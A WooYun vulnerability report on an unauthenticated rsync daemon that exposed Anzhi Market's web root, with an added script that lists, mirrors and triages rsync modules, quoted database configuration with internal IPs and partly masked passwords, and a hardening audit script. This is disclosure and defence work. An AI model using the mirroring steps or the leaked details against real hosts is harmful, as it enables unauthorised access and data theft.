
Unauthorized access to an Anzhi (安智网) service leaks the source code of Anzhi Market, the official site and the admin backend

2014-06-20 22:40

#1 Vulnerability description

Affected server: 220.181.167.247

Affected service: rsync daemon with no authentication configured; the module can be listed and read anonymously

#2 Exploitation

Listing the wwwroot module with no credentials:

[root@localhost ~]# rsync 220.181.167.247::wwwroot
drwxrwxr-x 4096 2013/09/30 16:21:10 .
-rw-r--r-- 5 2013/09/30 16:21:10 1.txt
-rw-r--r-- 205825 2010/05/20 16:43:48 200k.jpg
-rw-r--r-- 6168 2011/06/11 23:41:28 cache_common.php
-rw-r--r-- 0 2013/07/24 22:52:01 check_sersync
-rw-r--r-- 526 2011/06/17 23:58:46 index.html
-rw-r--r-- 17 2011/04/09 20:59:44 info.php
-rw-r--r-- 12742060 2011/06/23 00:08:29 new-wwwroot.tar.bz2
-rwxr-xr-x 7621 2011/06/18 20:32:22 stdafx.php
-rw-r--r-- 48 2011/04/27 17:38:32 test.php
drwxr-xr-x 4096 2013/09/30 16:24:03 admin.goapk.com
drwxr-xr-x 4096 2011/03/13 16:32:54 config
drwxr-xr-x 4096 2011/06/30 21:19:40 cron
drwxr-xr-x 4096 2011/04/27 18:15:49 data
drwxr-xr-x 4096 2011/03/13 16:32:54 doc
drwxr-xr-x 4096 2011/06/27 10:59:57 gomarket.goapk.com
drwxr-xr-x 4096 2011/06/22 13:44:52 market.goapk.com
drwxr-xr-x 4096 2011/05/27 10:21:53 model
drwxr-xr-x 4096 2011/07/01 10:39:06 new-wwwroot
drwxr-xr-x 4096 2013/11/25 17:33:31 sxy
drwxr-xr-x 4096 2011/06/01 15:12:01 tools
drwxr-xr-x 4096 2010/09/02 17:37:56 view
drwxr-xr-x 4096 2011/08/16 21:24:50 www.goapk.com
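The steps a tester takes against an open rsync daemon, as an added example that is not code from the original report: enumerate the modules the daemon advertises, list one module without transferring anything, mirror it, and triage the listing for the files worth reading first. The helper names, the output directory and the triage rules are this example's own; the embedded listing is constructed from entries quoted in the report so the triage can run offline.

```shell
#!/bin/sh
# Added example, not code from the original report. Enumerate an rsync
# daemon's modules, list and mirror one, and triage a listing for files
# that usually hold secrets or whole source trees. The embedded listing is
# constructed from entries shown in the report; everything else is assumed.

# List the modules the daemon advertises. "rsync host::" with an empty
# module name prints "name   comment" lines for every module with list=yes.
rsync_list_modules() {            # usage: rsync_list_modules HOST
  rsync --contimeout=5 "$1::" 2>/dev/null | awk 'NF { print $1 }'
}

# List the top level of one module without transferring any file.
rsync_list_module() {             # usage: rsync_list_module HOST MODULE
  rsync --contimeout=5 --list-only "$1::$2/" 2>/dev/null
}

# Mirror a module into a local directory (this is what leaks the source).
rsync_pull_module() {             # usage: rsync_pull_module HOST MODULE DESTDIR
  mkdir -p "$3" && rsync -a --contimeout=5 "$1::$2/" "$3/"
}

# Pure text processing: read an rsync listing on stdin and print the names
# of non-directory entries that typically carry credentials or full source
# (PHP/config files, archives, phpinfo and test pages).
flag_sensitive() {
  awk '
    $1 !~ /^d/ {
      name = $NF
      if (name ~ /\.(php|inc|conf|cfg|ini|env|sql|bak|tar|tgz|gz|bz2|zip)$/ ||
          name ~ /^(config|info|phpinfo|test)/ ||
          name ~ /(secret|passw|key)/)
        print name
    }'
}

# Number of entries in a listing, excluding the module root ".".
count_entries() {
  awk 'NF && $NF != "."' | wc -l | tr -d ' '
}

# Constructed sample: a subset of the wwwroot listing quoted in the report.
SAMPLE_LISTING='drwxrwxr-x 4096 2013/09/30 16:21:10 .
-rw-r--r-- 5 2013/09/30 16:21:10 1.txt
-rw-r--r-- 6168 2011/06/11 23:41:28 cache_common.php
-rw-r--r-- 17 2011/04/09 20:59:44 info.php
-rw-r--r-- 12742060 2011/06/23 00:08:29 new-wwwroot.tar.bz2
-rwxr-xr-x 7621 2011/06/18 20:32:22 stdafx.php
-rw-r--r-- 48 2011/04/27 17:38:32 test.php
drwxr-xr-x 4096 2011/03/13 16:32:54 config
drwxr-xr-x 4096 2011/08/16 21:24:50 www.goapk.com'

# Offline run on the sample. Against a live daemon the same pipeline is
#   rsync_list_module HOST MODULE | flag_sensitive
printf 'entries: %s\n' "$(printf '%s\n' "$SAMPLE_LISTING" | count_entries)"
printf '%s\n' "$SAMPLE_LISTING" | flag_sensitive
```

On a live target the order is `rsync_list_modules HOST`, then `rsync_list_module HOST MODULE | flag_sensitive` to see what an anonymous client can read, and only then `rsync_pull_module` into a scratch directory; the archive `new-wwwroot.tar.bz2` and the `*.php` entries are the ones the triage surfaces from the report's own listing.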

Proof of vulnerability:

#3 Sensitive information

http://admin.goapk.com/info.php # phpinfo



#4 Database configuration

$config['db']['master'] = array(
    'type' => 'mysql',
    'host' => '192.168.1.116',
    'port' => '3306',
    'username' => 'market',
    'password' => 'ya3****da0',
    'database' => 'newgomarket',
    'charset' => 'utf8',
);

$config['db']['slave'] = array(
    'type' => 'mysql',
    'host' => '192.168.1.117',
    'port' => '3306',
    'username' => 'market',
    'password' => 'ya3****a0',
    'database' => 'newgomarket',
    'charset' => 'utf8',
);

$config['db']['sphinx'] = array(
    'type' => 'sphinx',
    'host' => '192.168.1.81',
    'port' => '9312',
);

$config['cache']['memcached'] = array(
    'host' => '192.168.1.114',
    'port' => '11211',
);

$config['cache']['mysql'] = array(
    'dbserver' => 'master',
    'table' => 'cache',
    'key_name' => 'key',
    'value_name' => 'value',
);

$prefix = (GO_SERVER_IP == "192.168.0.99") ? '119.57.50' : '192.168.1';

$config['download_log_path'] = array(
    //P_LOG_DIR . "/" . 'market.goapk.com' . "/". $file,
    //P_LOG_DIR . "/" . 'gomarket.goapk.com' . "/". $file,
    "http://${prefix}.114:81/newgomarket.goapk.com/",
    "http://${prefix}.115:81/newgomarket.goapk.com/",
    //"http://${prefix}.114:81/goapk.yakergong.com/",
    //"http://${prefix}.115:81/goapk.yakergong.com/",
    "http://${prefix}.114:81/newmarket.goapk.com/",
    "http://${prefix}.115:81/newmarket.goapk.com/",
    "http://${prefix}.84:81/newmarket.goapk.com/",
    "http://${prefix}.84:81/newgomarket.goapk.com/",
    //"http://${prefix}.84:81/goapk.yakergong.com/",
    //"http://${prefix}.122:81/market.goapk.com/",
    //"http://${prefix}.122:81/gomarket.goapk.com/",
    //"http://${prefix}.122:81/goapk.yakergong.com/",
);

return $config;





#5 New backend database configuration

http://newadmin.goapk.com/index.php/Public/login

http://newadmin.goapk.com/Conf/config.php

<?php
return array(
    //'config key' => 'config value'

    /* Database settings */
    'DB_TYPE' => 'mysql', // database type
    'DB_HOST' => '192.168.1.116', // server address
    'DB_NAME' => 'newgomarket', // database name
    'DB_PORT' => 3306, // port
    'DB_PREFIX' => 'sj_', // table name prefix
    'DB_SUFFIX' => '', // table name suffix
    'DB_FIELDTYPE_CHECK' => false, // whether to check field types
    'DB_FIELDS_CACHE' => false, // enable field cache
    'DB_CHARSET' => 'utf8', // database charset, utf8 by default
    'DB_DEPLOY_TYPE' => 0, // deployment: 0 centralized (single server), 1 distributed (master/slave)
    'DB_RW_SEPARATE' => false, // read/write splitting, only meaningful for master/slave

    /* Error settings */
    'ERROR_MESSAGE' => '您浏览的页面暂时发生了错误!请稍后再试~', // error message shown when not in debug mode
    'ERROR_PAGE' => '', // error redirect page
    'URL_CASE_INSENSITIVE' => false, // whether URLs are case-insensitive

    'TOKEN_ON' => true, // enable form token validation
    'TOKEN_NAME' => '__hash__', // name of the hidden form field carrying the token
    'TOKEN_TYPE' => 'md5', // hash algorithm for the token





[image: anzhi.jpg]



Fix:

#1 Shut the service down if it is not needed

#2 Otherwise require a password (rsyncd "auth users" with a "secrets file") and restrict the allowed source addresses
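What "add a password" looks like in rsyncd terms, as an added example that is not part of the original report: an audit that reads an rsyncd.conf and reports every module reachable without credentials, the weak configuration the report's listing implies, and its hardened counterpart. The module name wwwroot comes from the report; the paths, the user name, the network range and the secrets-file location are this example's assumptions.

```shell
#!/bin/sh
# Added example, not from the original report: audit an rsyncd.conf for
# anonymous modules and show the hardened form. Module name "wwwroot" is
# from the report; paths, user, network range and file names are assumed.

# Read an rsyncd.conf on stdin and print one line per module that has no
# "auth users" (anonymous), noting when it is also unrestricted by
# "hosts allow" or writable. Global-section settings are inherited by every
# module, as rsyncd itself applies them.
audit_rsyncd_conf() {
  awk '
    function report() {
      if (mod == "" || auth) return
      msg = mod ": anonymous"
      if (!hosts) msg = msg ", no hosts allow"
      if (rw)     msg = msg ", writable"
      print msg
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    /^[ \t]*\[.*\][ \t]*$/ {
      if (mod == "") { g_auth = auth; g_hosts = hosts; g_rw = rw } else report()
      mod = $0; sub(/^[ \t]*\[/, "", mod); sub(/\][ \t]*$/, "", mod)
      auth = g_auth; hosts = g_hosts; rw = g_rw
      next
    }
    {
      eq = index($0, "="); if (eq == 0) next
      key = tolower(substr($0, 1, eq - 1)); gsub(/^[ \t]+|[ \t]+$/, "", key)
      val = tolower(substr($0, eq + 1));   gsub(/^[ \t]+|[ \t]+$/, "", val)
      if (key == "auth users"  && val != "") auth = 1
      if (key == "hosts allow" && val != "") hosts = 1
      if (key == "read only"   && (val == "no" || val == "false" || val == "0")) rw = 1
    }
    END { report() }'
}

# Create the secrets file rsyncd reads for "auth users". With the default
# "strict modes = yes" the daemon rejects a file readable by other users,
# so it is written with mode 600 from the start.
write_rsyncd_secrets() {          # usage: write_rsyncd_secrets FILE USER PASSWORD
  ( umask 077; printf '%s:%s\n' "$2" "$3" > "$1" ) && chmod 600 "$1"
}

# Constructed weak configuration: a module anyone can list and read
# (and, here, also write to).
WEAK_CONF='uid = root
gid = root
use chroot = no
max connections = 10

[wwwroot]
    path = /data/wwwroot
    read only = no
    list = yes'

# Constructed hardened configuration for the same module: not listable,
# read-only, limited to one internal range, credentials required.
HARDENED_CONF='uid = nobody
gid = nobody
use chroot = yes
max connections = 4

[wwwroot]
    path = /data/wwwroot
    list = no
    read only = yes
    hosts allow = 192.168.1.0/24
    hosts deny = *
    auth users = syncuser
    secrets file = /etc/rsyncd.secrets'

printf 'weak:\n';     printf '%s\n' "$WEAK_CONF"     | audit_rsyncd_conf
printf 'hardened:\n'; printf '%s\n' "$HARDENED_CONF" | audit_rsyncd_conf
```

Run `audit_rsyncd_conf < /etc/rsyncd.conf` on a host to get the list of modules that need the treatment in #2; after adding `auth users` and `secrets file`, write the secrets with `write_rsyncd_secrets /etc/rsyncd.secrets syncuser 'long-random-password'` and re-run the audit, which should then print nothing for that module.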

Source: www.wooyun.org/bugs/wooyun-2014-059688
